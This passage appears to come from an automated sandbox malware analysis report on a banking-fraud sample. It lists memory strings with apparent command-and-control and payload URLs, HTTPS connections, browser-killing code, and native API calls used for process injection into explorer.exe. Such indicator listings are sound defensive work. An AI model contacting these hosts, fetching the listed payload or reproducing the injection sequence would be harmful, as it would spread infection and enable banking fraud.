rundll32.exe, 
00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lew
            Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000008.00000002.4549635767.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000008.00000000.2321862445.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4544441283.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000008.00000000.2321008105.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4540619614.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3095470555.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3857371736.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/
            Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/.5
            Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/3405117-2476756634-1003
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/Z#q
            Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/eo
            Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/m
            Source: explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4538744172.00000000031FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/
            Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/E
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/N#e
            Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/a
            Source: explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/ys
            Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/uo
            Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/P
            Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/Q
            Source: rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/~C
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php5
            Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php6)
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.phpK
            Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.phpn)?
            Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/stop.php
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4550686972.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3101269732.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/files/stkm.bin
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/files/stkm.binSL
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/files/stkm.bino
            Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/p
            Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/q
            Source: explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/
            Source: explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54
            Source: explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19
            Source: explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/4560
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/4560D
            Source: explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/X
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/t60G
            Source: explorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/w
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/
            Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/%
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/W
            Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/gop.php
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.php
            Source: rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.phpo
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.phpu
            Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
            Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

            E-Banking Fraud

            Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe 8_2_0E454948
            Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe 8_2_0E454948
            Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\rundll32.exe Code function: 3_3_000001CEAFE2D2B6 NtAllocateVirtualMemory,3_3_000001CEAFE2D2B6
            Source: C:\Windows\System32\rundll32.exe Code function: 3_3_000001CEAFE2D326 NtProtectVirtualMemory,3_3_000001CEAFE2D326
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4BE0 NtProtectVirtualMemory,3_2_000001CEAFCA4BE0
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4FF0 NtQueueApcThread,3_2_000001CEAFCA4FF0
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC717B0 NtClose,NtClose,3_2_000001CEAFC717B0
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4360 NtCreateThreadEx,3_2_000001CEAFCA4360
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4740 NtFreeVirtualMemory,3_2_000001CEAFCA4740
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA3F40 NtAllocateVirtualMemory,3_2_000001CEAFCA3F40
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC87A50 NtSetContextThread,3_2_000001CEAFC87A50
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC71600 NtClose,RtlExitUserThread,3_2_000001CEAFC71600
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC88149 NtSetContextThread,3_2_000001CEAFC88149
            Source: C:\Windows\System32\rundll32.exe Code function: 4_3_00000276197BD326 NtProtectVirtualMemory,4_3_00000276197BD326
            Source: C:\Windows\System32\rundll32.exe Code function: 4_3_00000276197BD2B6 NtAllocateVirtualMemory,4_3_00000276197BD2B6
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000276196271B0 NtClose,4_2_00000276196271B0
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619638149 NtSetContextThread,4_2_0000027619638149
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654BE0 NtProtectVirtualMemory,4_2_0000027619654BE0
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654FF0 NtQueueApcThread,4_2_0000027619654FF0
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000276196217B0 NtClose,NtClose,4_2_00000276196217B0
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654360 NtCreateThreadEx,4_2_0000027619654360
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619653F40 NtAllocateVirtualMemory,4_2_0000027619653F40
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654740 NtFreeVirtualMemory,4_2_0000027619654740
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619621600 NtClose,RtlExitUserThread,4_2_0000027619621600
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619637A50 NtSetContextThread,4_2_0000027619637A50
            Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000002339FC7D2B6 NtAllocateVirtualMemory,6_3_000002339FC7D2B6
            Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000002339FC7D326 NtProtectVirtualMemory,6_3_000002339FC7D326
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4360 NtCreateThreadEx,6_2_000002339FBB4360
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB817B0 NtClose,NtClose,6_2_000002339FB817B0
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB3F40 NtAllocateVirtualMemory,6_2_000002339FBB3F40
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4740 NtFreeVirtualMemory,6_2_000002339FBB4740
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB81600 NtClose,RtlExitUserThread,6_2_000002339FB81600
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB97A50 NtSetContextThread,6_2_000002339FB97A50
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB98149 NtSetContextThread,6_2_000002339FB98149
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4FF0 NtQueueApcThread,6_2_000002339FBB4FF0
            Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4BE0 NtProtectVirtualMemory,6_2_000002339FBB4BE0
            Source: C:\Windows\explorer.exe Code function: 8_2_0303C704 NtDelayExecution,8_2_0303C704
            Source: C:\Windows\explorer.exe Code function: 8_2_0303B388 NtAllocateVirtualMemory,8_2_0303B388
            Source: C:\Windows\explorer.exe Code function: 8_2_030382B4 NtFreeVirtualMemory,8_2_030382B4
            Source: C:\Windows\explorer.exe Code function: 8_2_030401A0 NtFreeVirtualMemory,8_2_030401A0
            Source: C:\Windows\explorer.exe Code function: 8_2_030381C8 NtWriteFile,8_2_030381C8
            Source: C:\Windows\explorer.exe Code function: 8_2_03038240 NtClose,8_2_03038240
            Source: C:\Windows\explorer.exe Code function: 8_2_030380B8 RtlInitUnicodeString,NtCreateFile,8_2_030380B8
            Source: C:\Windows\explorer.exe Code function: 8_2_083882B4 NtFreeVirtualMemory,8_2_083882B4
            Source: C:\Windows\explorer.exe Code function: 8_2_0838B388 NtAllocateVirtualMemory,8_2_0838B388
            Source: C:\Windows\explorer.exe Code function: 8_2_08388240 NtClose,8_2_08388240
            Source: C:\Windows\explorer.exe Code function: 8_2_083880B8 RtlInitUnicodeString,NtCreateFile,8_2_083880B8
            Source: C:\Windows\explorer.exe Code function: 8_2_0838C704 NtDelayExecution,8_2_0838C704
            Source: C:\Windows\explorer.exe Code function: 8_2_083901A0 NtFreeVirtualMemory,8_2_083901A0
            Source: C:\Windows\explorer.exe Code function: 8_2_083881C8 NtWriteFile,8_2_083881C8
            Source: C:\Windows\explorer.exe Code function: 8_2_088582B4 NtFreeVirtualMemory,8_2_088582B4
            Source: C:\Windows\explorer.exe Code function: 8_2_0885B388 NtAllocateVirtualMemory,8_2_0885B388
            Source: C:\Windows\explorer.exe Code function: 8_2_088580B8 RtlInitUnicodeString,NtCreateFile,8_2_088580B8
            Source: C:\Windows\explorer.exe Code function: 8_2_08858240 NtClose,8_2_08858240
            Source: C:\Windows\explorer.exe Code function: 8_2_088601A0 NtFreeVirtualMemory,8_2_088601A0
            Source: C:\Windows\explorer.exe Code function: 8_2_088581C8 NtWriteFile,8_2_088581C8
            Source: C:\Windows\explorer.exe Code function: 8_2_0885C704 NtDelayExecution,8_2_0885C704
            Source: C:\Windows\explorer.exe Code function: 8_2_0E45241C NtAllocateVirtualMemory,8_2_0E45241C
            Source: C:\Windows\explorer.exe Code function: 8_2_0E45248C NtFreeVirtualMemory,8_2_0E45248C
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D56B7C: CreateFileW,DeviceIoControl,CloseHandle,3_2_00007FF8A8D56B7C
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CFDA48 CreateEnvironmentBlock,GetLastError,_invalid_parameter_noinfo,_invalid_parameter_noinfo,DestroyEnvironmentBlock,GetSystemDirectoryW,PathAddBackslashW,swprintf,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,3_2_00007FF8A8CFDA48
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A481C8_2_0E4A481C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4888248_2_0E488824
            Source: C:\Windows\explorer.exeCode function: 8_2_0E48D8348_2_0E48D834
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DD8B88_2_0E4DD8B8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C98B08_2_0E4C98B0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E49408_2_0E4E4940
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45D9E48_2_0E45D9E4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C89808_2_0E4C8980
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4796508_2_0E479650
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DD63C8_2_0E4DD63C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4757688_2_0E475768
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C672C8_2_0E4C672C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4677E08_2_0E4677E0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B87888_2_0E4B8788
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A74488_2_0E4A7448
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4AE45C8_2_0E4AE45C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C24308_2_0E4C2430
            Source: C:\Windows\explorer.exeCode function: 8_2_0E49F4C48_2_0E49F4C4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B84D88_2_0E4B84D8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4D94F08_2_0E4D94F0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B34988_2_0E4B3498
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4705408_2_0E470540
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4585688_2_0E458568
